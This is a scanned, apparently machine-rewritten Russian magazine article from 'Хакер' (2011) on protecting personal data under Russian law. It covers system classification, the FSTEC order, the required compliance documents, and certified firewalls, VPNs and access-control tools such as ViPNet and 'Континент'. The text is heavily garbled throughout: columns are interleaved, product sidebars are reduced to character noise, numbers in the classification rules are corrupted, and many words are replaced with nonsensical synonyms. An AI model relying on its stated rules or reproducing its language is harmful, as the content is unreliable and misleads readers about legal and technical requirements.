ЗАЩИТА ДАННЫХ ДЛЯ ИНТЕРНЕТЧИКОВ Владельцам интернет-ресурсов, которые решили озаботиться соблюдением законов, мы бы nорекомендовал преобразить забота на сайт www . gosus l ugi.гu . При регистрации после этого вылезает замечательное nользовательское соглашение, соответственно образу да nодобию которого есть смысл

изготовить свое- сие избавит через солидной части руководящий боли. В идеале, всегда nередаваемые тебе nереанальные документация nользователей

должны nризнаваться общедостуnными тож обезличенными.

08-й веление ФСТЭК обязателен ко прочтению

фицируют сотрудники московской nолиции, в некоторых случаях сnрашивают nро­

:1.

катамнез в отношении человеке. Когда ряд комnьютеров [неважно,

nиску

nодключены они ко недотка или — или нет!, стоит только сковывать во одну ИСПДн?

сведениям, начинай а отдельное ФИО- уж ко общедостуnным не в таком случае — не то обезли­

Вся nрочая сообщение еще относится ко доnолнительным

По функциональному nризнаку. То есть, равно как минимальное значение нужно от­

ченным. Помимо класса ИСПДн что поделаешь оnределить, являются

разъединять бухгалтерию ото кадров [хотя, неравно машин равным образом там, равно затем

ли они тиnовыми, другими словами а сnециальными. В нежели отличие? К тиnовым

мало, ведь допускается их объединить,- быстрее всего, переаттестация выйдет

nредъявляются исключительно запросы объединение сохранению конфиденци­

дешевле!. И малограмотный имеет смысл бесnокоиться касаясь nриказов равным образом договоров,

альности информации . Если нам нужна пока что равно общность и/или

во которых фигурируют ФИО сотрудников равным образом учредителей- сверху моей

достуnность- наша ИСПДн становится сnециальной. Я знаю, сколько сии

nамяти сызнова отнюдь не было случая, в надежде получи зто обращали внимание. В

три свойства являются основой информационной безоnасности по образу

любом случае, сии документация дозволено помянуть общедостуnными nри

таковой, равно избрать больше важное, соответственно сути, нельзя. Позтому оставим

дальнейшей классификации.

юридическую сторону оnределения данного воnроса во стороне да

nосмотрим в факты. Факты а во следующем. Для тиnовых ИСПДн

РАЗДЕЛЕНИЕ НЕСКОЛЬКИХ ИСПДН

воспрещено образовывать частную трафарет угроз - угрозы безоnасности

Первоначально оно nроисходит для бумаге. На каждую выделенную

информации во тиnовых ИСПДн оnределены на << П оложе н ии по отношению мето­

ИСПДн составляются отдельные акты обследования равно классифи­

дах да сnособах защиты информации на информационных системах

кации, во которых указываются ее оnределяющие характеристики

nереанальных данных>>- книга самом nриложении для 08-му nриказу

[категория равно широта обрабатываемых nереанальных данных, оnреде­

ФСТЭК. Рекомендую не без; ним ознакомиться. На nрактике большую доля

ляемый сверху их основании род ИСПДнl, а равным образом число техниче-

тиnовых ИСПДн, которые автор этих строк видел, работая интегратором, составляли

ских средств. Стоит nомнить по отношению том, что, nомимо неnосредственно

небольшие [до 00 машин! ИСПДн, расnоложенные локально, чаще

комnьютеров, обрабатывающих nереанальные данные, стоит только означить

всего- неодинаковые бухгалтерии равно кадры.

да сетевое оборудование, входящее на контингент ИСПДн. Составление nеречня сетевого оборудования- будет созидательный nроцесс.

Однозначно его оnределить nолучится лишь только буде ИСПДн выделена в обособленный облеченный плотью секция Сети . Скорее всего, интересующие нас комnьютеры nодключены ко коммутаторам уровня достуnа, ко кото­

рым nодключены равно совершенно прочие рабочие руки станции. В этом случае их

определять безвыгодный стоит, всё-таки на акте обследования приходится короче отметить тот факт, зачем ИСПДн входит на поезд общей сетич.

Сnерва разберем классификацию . Существует двум классифицирую­ щих nризнака-категория обрабатываемых nереанальных данных

Хnд да широта Хнnд. С объемом постоянно nросто: прежде тысячи субъектов nер­ еанальных данных Хнnд равен 0, ото тысячи перед ста тысяч Хнnд равен2, свыше ста тысяч Хнnд равен 0. Нумерация нисходящая- меньшая цифра указывает нате болий формат , С Х nд сложнее . Существует че­ тыре категории nереанальных данных. Общедостуnные тож обезли­

ченные nереанальные способности Хnд равны 0, nереанальные данные, nозволяющие прозрачно аутентифицировать субъекта nереаналь­

ных данных Хnд равныЗ, самоочевидно отождествить равно nолучить доnолнительную информацию Хnд равны 0, равно nолучить особую ин­

формацию [nеречень особых сведений допускается выкопать возьми www.wikisec. гu равным образом на трехстороннем nриказеl Хnд равны 0. Если со nервой категорией все более-менее ясно, так дальше- хуже. Перечень nереанальных данных, что необходим для того однозначной идентификации субъекта nереанальных данных, малограмотный оnределен . Не оnределено то,

в чем дело? пересчитывать общедостуnными nереанальными данными. В качестве отnравной точки могу nорекомендовать исnользовать nасnортные данные человека- фактически, собственно беспричинно нас положительно иденти-

030

Девушка рекомендует Stoпegate

Firewall

ХАКЕР

01/154/2011


Н а страже п е р еана льн ых д практически н ых

Управлени е се ссиями

ПОМНИ О СЕРТИФИКАТАХ На сайте ФСТЭК позволяется н айти словник сертифицированных средств защиты информации, хотя спирт в некотором расстоянии невыгодный спокон века актуален. Если интересует в некоторой степени конкретное - так скорее попросить у дилера сертификат. И хоть лопни подождите пора его действия! Если срок действия сертификата кончается, а у вендара сейчас глотать новая версия- так договор нате старую могут да невыгодный продлить. информация касательно сессии

То есть, самые типовые случаи, рано или поздно исполнение дополнитель­ Це нт р а лизованное у nравn е ние г у лnо й м е жс етевы х вот как ранов , у становленны х

хайло н овленны х на различны х се гнета х корпорати вно й путы ! на ко люч а мы ЛВС- ВЛВС )

ного движение кета документов (а сие равно как минимальное значение <<Частая шаблон угроз безопасности переанальных данных>> да <<Частное техническое зада­

ние для разработку системы защите переаналь н ых д практически н ых>> ! оказыва­ лась п росто приземленно невыгодна - расчёт ото использования меньшего количества средств защиты малограмотный покрывала расходов получи

разработку документов. Если но у тебя сложная распределенная ИСПДн либо — либо попросту есть желание отлучиться с каких-то пункта в, указанных во << Положении в рассуждении мето­ дах .. .>> -то желательно допускать свою ИС ПД н специальной.

Кроме того, на п оследней редакции 052-ФЗ указано, что-то что касается п ератор

Выделенная трал alias

сам по себе определяет палитра необходимых мер равным образом способов согласно защите

защищенные каналы управnения

информации на ИСПДн. Многие коммерческие конторы этому очень обрадовались, в такой мере во вкусе сие небось бы позволяет убраться ото необходимости Мониторинг из осто моя особа ния и пол н оф у н для цион а льно е упр а вл е н ие

П л а тфор ма

Windows равно Unix

Си стем а ц ен тр а л изова нн ого

использования сертифицированных средств защиты информации,

упра на л е н равным образом аз многогрешный сете нет слов й

одно называние по части которых сподручно породить у системных админи­

безопа сн волос ю

ISPmonJ

страторов приступы зубовой боли равно нервную трясучку. К сожалению,

во другом месте сие г что до но закона указано, в чем дело? запросы до безопас­ В а р иа н твоя милость равным образом споль з ования СС ПТ-21с оборона - гtс .г u )

ности переанальных данных определяют соответствующие органы

исполнительной администрация (и приведен список сих органов!. Вот и понимай текущий глава вроде хочешь. Так который ваш покорнейший слуга бы в эту пору безграмотный стал надеяться на лучшее- воспользоваться сертифицированные фонды защиты

ПАКЕТ ДОКУМЕНТОВ

все придется.

ЧТО НАМ ИСПОЛЬЗОВАТЬ? В первую очередь, нужно уразуметь , ото что наша сестра будем защищаться.

0. 2. 3. 4. 5. 6. 7. 8.

0.

Положение об обработке переанальных данных;

Случай стандартный ИСПДн считать нестоит-там безвыездно ясно.

Аналитический подотчет соответственно результатам обследования

А в целях специальной составляется << Частная имитация угроз>>. Она

информационных систем п ереанальных данных;

составляется на соотве т ствии вместе с <<Методикой опре д еления актуаль­

Модель у г роз безопасности переанальных данных;

ности угроз без п асности переанальных данных на информационных

Частная конверсив угроз безопасности переанальных данных;

системах переанальных данных>>. Методика написана более-менее

Приказ об назначении администратора безопасности;

понятным языком , а материалов в рассуждении том, в духе ее писать, предостаточ­

Приказ по части назначении комиссии объединение защите информации;

но. Ограничусь некоторыми советами:

Инструкция администратора безопасности;

0.

Инструк ц ия пользователям информационных систем

Прочитай << Положение .. .>> равным образом возьми его следовать основу ради выдумы­ вания возможных угроз- другим образом рискуешь со одной стороны

переана ль ных д а нн ых;

н а п исать сли ш кусок м н по отношению г об подобно как комок п ью т ерных угроз, равно позабыть п ро

Акт обследования информационной системы переанальных

организацион н ые моменты;

0.

данных;

00. Акт

классификации информационной системы переанальных

щититься. Для них убирать одна замечательная формулировка: << Данный

данных;

01. Акт

классификации автоматизированной системы;

02 . Технический

Не бойся представлять те угрозы, с которых твоя милость невыгодный сможешь за­

свидетельство инфо р мационной системы переанальных

атаки подобного рода из возможным уроном субъектам п ереаналь­ ных данных>>. Н в рассуждении пользуйся ей от умом, невыгодный считая панацеей через всех

данных;

03. Список лиц, допущенных ко обработке информации на ИСПДн;

04. Список лиц, допущенных

видимость угроз безопасности переанальных данных слышно

неактуальным на связиснесоразмерностью затрат держи выполнение

для техническому обслуживанию

бед. И ужетем более-не бойся ее видоизменять;

0.

Подумай по-над тем , аюшки? бы твоя милость всерьёз хотел привести в исполнение на

технических средств, вмещающийся на ансамбль информационной

своей сети- невыгодный к защиты переанальных данных, а про « личной

системы переанальных данных;

гигиены >> . Некоторые добро мож н что до исполнить равным образом не без; использова­

05. П еречень обрабатываемых переанальных д анных; 16. Техноло г ический п роцесс обработки п ереанал ь ных д анных; 17. Матрица доступа ко ресурсам информационной системы переанальных данных;

08. Акт

ввода информационной системы переанальных данных на

эксплуатацию.

ХАКЕР

01/154/2011

нием сертифицированных средств защиты информации. Как это сдела т ь, автор этих строк расскажу горизонт ш е.

Итак, задним числом того , как бы ты да я определились не без; перечнем актуальных

угроз, стоит только предпринимать выбором технических средств. Для начала стоит уяснить, что такое? нам нужны средства, которые имеют свидетельство

031


SYN/ACK по защите ото НСД lнесанкционированного доступа], цертификат по межсетевым экранам IМСЭ], равным образом свидетельство до шифрованию к орга­ низации

VPN . Кроме

наличия сертификата должно устремить заинтересованность

Модельный строй АПКШ ••континент~~

держи то, разрешено ли утилизация выбранного деньги во ИСПДн

вашего класса- эту информацию не запрещается отрыть на сертификате, Нонтинент

формулировка во виде «допускается ко использованию на ИСПДн до самого

класса К1 включительно>> . Некоторые капитал lв основном- ино­

Mini-IТX

странные] далеко не допускаются ко использованию во ИСПДн класса К1. Причины такого решения наших сертифицирующих органов лежат, скорее, на политической, а безграмотный исключительно технической области.

0 ~ Ethernet

mtnt

Континент

0 S M6иr/c

l20 Mбt~1/C

000 Мбмт/с

0S Mб01r/t

000Мбит/с

0Гб равно #с

0х Et hefnet 00/100/1000

00/ 000/ I QOO {3 оnционаnьно)

IPClOOO

Ethernet 00/100/1000

l xSfPonr мцecМ>~A

д•

".

Итак, дай сделаем сокращенный наблюдение больше всего то и дело используемых

сертифицированных технических средств защиты информации. Их ДоS

позволяется распилить бери три категории:

Континент 2Ur.~tk

ОБЗОР СРЕДСТВ

0.

IPClOO ,

lU

(iК'I И ВНQ-ПiКСИIИЫА

{а111 " вно-~виыА

IIJ\acтepj

IUI.Jtrep)

0SO

000

ДоSОО

До

0000

Локальные СЗИ НСД !средства защиты информации ото несанкцио­ нированного доступа]

0. Межсетевыеэкраны 3. Средства шифрования [в эту категорию входят равным образом VРN-решения]. Почему условно? У некоторых решений очищать ряд сертифи­

Модельный строй Континента (из официальной презентации)

для атов- например, до <<НСД равным образом МСЭ>> [межсетевое экранирование], <<МСЭ равно шифрование>> да беспричинно далее.

0 Н3С1011Щ!! IPEI~I A 0 COCfЭI vtf>Net CUST0h1 UОДIП !\оМе 05-тм РЭ3П11ЧНЫХ КОМПОН8КТОI, ПОЗ80ПЯJ:\Щ11Х P83ЛH30I'illb МНОЖI!СТIО щенарие1 ЗЗЩIIТW ttнформац~ш 0 со1ременных uуnьтмсеренсиых сетях tiЯ311.

Разберем локальные имущество защиты информации с несанк­ ViPNet Мtnlnistrator ционированного доступа. VIPNetAdmlnistrэtor !Ацl.tнннстратор)- сие Оаэоеыii nроrраLt мный кotJnneкcдnя насrроitкн равным образом ущ1аеnенмя

Наиболее распространенными являются:

0. Dallas Loc k; 2. СтражNТ; 3. Secгet Net; 4. Сертифицированная

03Щ11ЩtННОИСеТЬ10.110'1ЮЧаDЩШ'ilсtбЯ.

• VIPNet NCC (Центр YnpaвneHIIЯ Сеть10, ЦУС)- nроrрзмr.сное о(lес:nечение. nредназначенное дм KOHфllryPIIPOiaHIIA 01 )"'ЛраапеНИЯ IIIPJY3llbHOi!ЗaЩitЩIHHOЙ UП.IO VIPNet • V!PNet КС & СА (УдостоверАIОЩiнi равно Кnl!)lletOii Цetnp. УКЦ) - nроrрам~о~ное oGec:neчeн~re. коtорое eыnonнRe-r фyt~IЩHtl цetnpa формированкя кn10чей wrtфpotЗНIIR н nереанальных ключе~i nonьзotaн'!nei1-кn10чetoro центра. а

taJOI(e

фfНКЦIIИ YдocrotepЯIOщero Ц!нтра.

VIPNetstate\Vatt11er

издание

Windows 0.

VIPNet StateWateher (Ценrр IAOHIПOPIIHta, Цld) - nporparAJ.tHblli

коммекс, некоторый реаnи.Э.О13Н за кnиент­

серверtЮi\ техноnоnш да nредназначен .цпя центраniUоеанноrо мониrор11нrа соаояН tiЯ узловзащищенноi1 cвrn

VIPNel VIPNet state\Yatctrer nредстэвnяеt соОой nроrраммный сер"р со стандарtноli SОL-базой данных СОСТОЯНМJI YЗIIOI cent. yc:ra.нaenrlta&~lblil соемесrно от ПOVIPHet CUent из 0031.10ЖНОСТЬIО Доа)nа К

Первые двоечка капитал защиты отличаются тем, который весь невыгодный имеют аппаратной части, сие окончательно софтверные решения .

Dallas Lock

ЭПIIА даннымtt резуnьrатаu рабоtы nраем анаn1133 состояния yзnot от mаленныi'l WеО.ДОСТ)"'Л с 11сnользоеанttембрауз:ера.

на моей

VIPNet Puьticatlon Service

nрактике во последнее миг на поверку малограмотный применялся, по вине отнюдь не само­

Пporpaur.ca

го удобного интерфейса конфигурированияинеспособности интегриро­

серпtфикатоl)ll mиacot отозванных свршф111(3t01 (СОС) возьми точках расnроаранен11Я данных. Также

ваться на

AD . Однако во рабочей группе дьявол разворачивается ахти удачно. NT>>настраивается проще, тем не менее его неспособность интегрироваться во AD вновь а ограничивает его распространение. Secгet Net [точнее , его сеточный вариант] сего недостатка лишен.

OбetneЧIIIatTCЯ lti.IЛOpt СОС, cфOI)t.II)OIЗHHЫX CТOI)OНHIII•IИ УЦ.

<<Страж

VIPNe!ReglslralionPolnt Проrрамuный комnлекс VIPNet ЭЗЩIIЩIННОfО

YiPNet Coor~nator (Unu.x)

поддержки, котораяпозволяетконтролировать процессзагрузки

управления съемными накоnителями информации- собственно , симпатия

Reg!stratlon Potnt (Пtнкт Реmстрацюt}nреднэзначендnя соэданкя N'N pernctpaЦ\111 ЛOЛio30iaTtЛ&il , JII)ЗHIHIIЯ 0)8fИСТI)аЦI\ОННЫХДаННЩ СОЗДЗНifА ЭЭПI)ОС.ОI 013 IIIU Oб01Y*\I&aHIIII 0 УКЦ. а ТЭJОКе 0ЭЛРОСОI НЗ фopr.ti11)083НIIII КЛIОЧI!IЫХ VIPNet во УКЦ

&blЛJ'CIC CII)Т1tфHЦIT08

дистрнбуntео• nоnьэоватеnей путы

Кроме того, дьявол имеет случай подключения платы аппаратной

со съемных носителей, да у него аспидски недурственно работает приспособление

VIPtlet PuЫicalion SeMce (CepttlcП~rtкaциll) nредназначена А/IЯ arтoмaт11:UЩIIII nроцеСС~:~ на

Л)'бЛIIKЗЦIIIIIЫПruttHHЫX 0 УЦ Yif'Net ctptМфitКЭfOI (aд,t.IHHHCТpЭJOPOI, ЛOЛioЗOIЗftлt li, ЦIОСС·

0 U111

позволяет целиком удостоверять подсоединение равным образом разъединение

любых устройств. Для аюшки? нужны локальные СЗИ НСД? Этот воnрос волнует многих

ViPNet Coordlnator {Linwr.)- f10ЛHOфjo't!IЩIIOH3ЛioHЫЙ nporpa~tMHЫЙ C8PitP 03ЩIIЩIIHHOЙ CI!TII ViPNet устанэаrшвэемый получи и распишись ОС llnux сАДРам н 0.4 0131 -2 0.2126 (Aitcтplt6J'ПIIW RedHat Suse \\дР ) 0 зае.исш.tоа\1 от нacrpoeкViPNet Coordlnator может выnоnняn. cneдi'IDЩIIt Ф~litЩ\111 • Сер~ера IР-адресов, • ПpOKat•C8ptep3 laЩIIЩIHHblX COIДIIHIHIIIi; • Tyинenllpy!OЩero сервера (кPIImownюзa}; • ltleжceтeвoro 0\фана дnя отхрыты-. защкщеиных ресурсов да туннеnи руемыхресурсов, • Сереераэащ11щеннойnоЧТЬ1; • Oткээoycтoii'IIIIOfO сарвера эащ11щенной cern VIPNetв конфнrураЦIIН VIPNet Faitover ViPNel Cluster (Windows)

системных администраторов, которым nриходится от ними сидеть

Проrрэuмный коммекс

:]. В идеале, они должны заключать проход ко рабочему месту,

OOpallaтыta18 сетной траф11к, nостулэюЩttй

VIPNet Cluster -зто nporpauuнoe обесnечение АЛЯ ОС WindoWs ХРМв!а/2003, VIPNet Clusщ aJO(.Qбtн 111 неасоnыаtхсетей, неnосреда~енно n одкnюченнЫJ\ для нещ.

основанное получи nрннЦitnю: выеакай достулноспt" раа~редеnен•tя наrруэки. ПК

ВСе простейшие положения кластера nредстаiF!ены 0 каw.доi11tз nодкn1011енных сете1i одним н 0 01.с но tP-aдpecou, коtорый одиовре u енно акп11ен сверху асех эnе м ентах кnастера. Это oбetпtЧ II Iaeт моменталь ное

бери котором обрабатывается какая-либо важная информация. Не­

nерераслредеnение Ф\-141ЩНЙ 0 мастере на случае отказа ОАНоrо ИJ злементо• ПKVIPNet Ctuster nоэвомет со.эдm IIHфpaap)'К'I)'py, коtорая rapalffitl)rtt еесnере!lойность nередачи данных. прежде tex пор, nока хоть Оы

обходимость использования подобных средств является тяжелым

ОДIIНИЗЗЛIIо!ВнtОiкnастерарабОТОСЛОСО0 е н PeKOhltндYtTCЯIIMIТbiCOCТЭ:IIКЛЗCI'epaнelo\IHettpeJt

наследием эволюционного развития государственной системы за­

:O.ПI'UII'WТf11111Щ'IГfll'n:l

R .~тnt.~ mV\1:11\ nnr:n•r:ll\trA

u:~t~r:им:tnмt:U. llflrlll'nм~wnr:n..•ntпnnnя

щиты информации- если бы вглядеться нате сертификаты сих средств

защиты, в таком случае бросьте ясно, откуда родом они пришли. Межсетевые экраны:

0. ССПТ-2; 2. АПКШ << Континент >>; 3. VipNet IPeгsonal Fiгewall равным образом Office Fiгewall, VipNet Client]; 4. TгustAccess; 5. Stonegate Fiгewaii/VPN. Часть изо сих решений аппаратная, часть- программная. Пре­

Компоненты

VipNet Custom (с официального сайта)

ГОСУДАРСТВО РЕКОМЕНДУЕТ Если твоя милость работаешь на органа х государственной власти, то,

имущества равно необеспеченность обеих вариантов твоя милость равно самоуправно повинен вкушать ,

верней всего, свободы выбора средств защиты у тебя далеко не будет­

да вызвать в памяти неграмотный помешает. Как минимум, инъекция аппаратного

чаще лишь подобные решения спускаются сверху. Если его до этих пор

решения требует некоторой переработки существующий карточная игра

невыгодный было- невыгодный поленись да составь задание во вышестоящий орган,

сети, почто влечет вслед за внешне дополнительные расходы, на так пора что

другим образом может быть так, который твою ласково выстроенную СЗПДн

программные решения позволяют сего избежать. Аппаратные

придется разбирать, а впоследствии сызнова равно увертываться вопросов в рассуждении нецелевом

решения в большинстве случаев выигрывают по мнению быстродействию равным образом за функциона-

использовании бюджетных средств.

032

ХАКЕР

01/154/2011


На страже переанальных данных

л у. Программные решения- сие система

VipNet- VipNet Client VipNet Custom,

является VРN-клиентом с состава комnлекса

реализующего nрограммный

VPN, nроизводит их отечествен-

ная команда <<Инфотекс>>. В принципе, вничью никак не примечатель­ ные межсетевые экраны, работающие держи собственном движке,

да Tгust

Access- результат <<Кода безопасности>>. В нежели между ними разница? VipNet делится получи неуд продукта- переанальный VipNet Peгsonal Fiгewall, солидаризирующийся только лишь одинокий сетевой интерфейс, да шлюзовой VipNet Office Fiгewall, способствующий

КАК ПОНИЗИТЬ КЛАСС ИСПДН, ЕСЛИ У ТЕБЯ ОБРАБАТЫВАЕТСЯ БОЛЕЕ СТА ТЫСЯЧ СУБЪЕКТОВ?

серия интерфейсов. Больше разницы в кругу ними нет. Водан

Разделить ее. Если эмпирика хранятся предметно бери разных

равно оный но интерфейс, единственный да оный а функционал. Системы центра­

серверах, в таком случае сие отнюдь не проблема. Другой вопрос, сколько во натуральный

лизованного управления нет, настройки получи каждом межсетевике

минута сие сейчас неграмотный круглым счетом актуально, разве всего твоя милость никак не планируешь

придется прекращать отдельно. Возможность выгрузить конфигура­

эксплуатнуть решение, далеко не сертифицированное подина К1

цию равно как отнюдь не была обнаружена. Tгust

Access

же, во-первых, имеет

шанс централизованной настройки и, исключая того, реали­ зует дополнительную аутентификацию рядом обращении ко защищае­ мым серверам- до протоколу КегЬегоs. Достаточно занятный

посмотреть получи и распишись сайт отечественного реселлера равным образом специфицировать таковой вопрос.

продукт, но, ко сожалению, автор вместе с ним работал мало, да синь порох безграмотный могу

Продает их, для слову сказать,

добавить.

Safe-Line.

VРN-решения:

АППАРАТНЫЕ РЕШЕНИЯ

0. VipNet Custom; 2. АПКШ <<Континент>>.

ССПТ-2- сие всегдашний умная машина на промышленном испол­ нении, шабашничающий подо FгeeBSD. Добраться перед настроек ОС, ко

Про <<Континент>> моя персона ранее говорил, эдак ась? скажу пару слов относительно

сожалению, нельзя. Если тебе нужен не мудрствуя лукаво аппаратный межсете­

VipNet Custom. В разница через <<Континента>>, сие значит программ-

вопль зкран вместе с хорошим быстродействием- возлюбленный идет получи и распишись эту роль.

ное решение. Состоит с трех частей: серверной частичасти перед

Также есть расчет отметить, в чем дело? своих IР-адресов у него нет, посему рядом

названием VipNet Соогdiпаtог !есть версии подина Windows равно Liпux],

внедрении безвыгодный потребно хорэ указывать дополнительные адреса равно пере­

клиентской части VipNet Client !Windows only] равным образом программы управ­

краивать схему адресации. Настройка производится вроде локально,

ления !тоже лишь по-под Windows]. Программа управления в свою очередь со­

от консоли, таково равным образом путем веб-интерфейс, тот или иной эскизно

имеет смысл изо двух частей: <<Центра управления сетью>>, идеже генерируется

необходимо короче включить.

фрейм Сети, равным образом <<Удостоверяющего Ключевого центра>>, на котором

АПКШ «Континент»- АПКШ расшифровывается в качестве кого

происходит заведование ключами да сертификатами. Сертификаты

<<аппаратно-программный странность шифрования>>, равным образом безусловно -у него

использует встроенная электронная почта, быть подписи зашиф­

снедать аттестат по мнению шифрованию. Скажу даже, в чем дело? сие живей VРN­

рованных сообщений. Помимо защищенной электронной почты,

решение, нежели несложно межсетевой морда . Он в свою очередь представляет с

вкушать равным образом огражденный мессенджер как аськи. Несмотря для la

себя нотбук во промышленном исполнении вместе с FгeeBSD сверху борту.

может быть, равным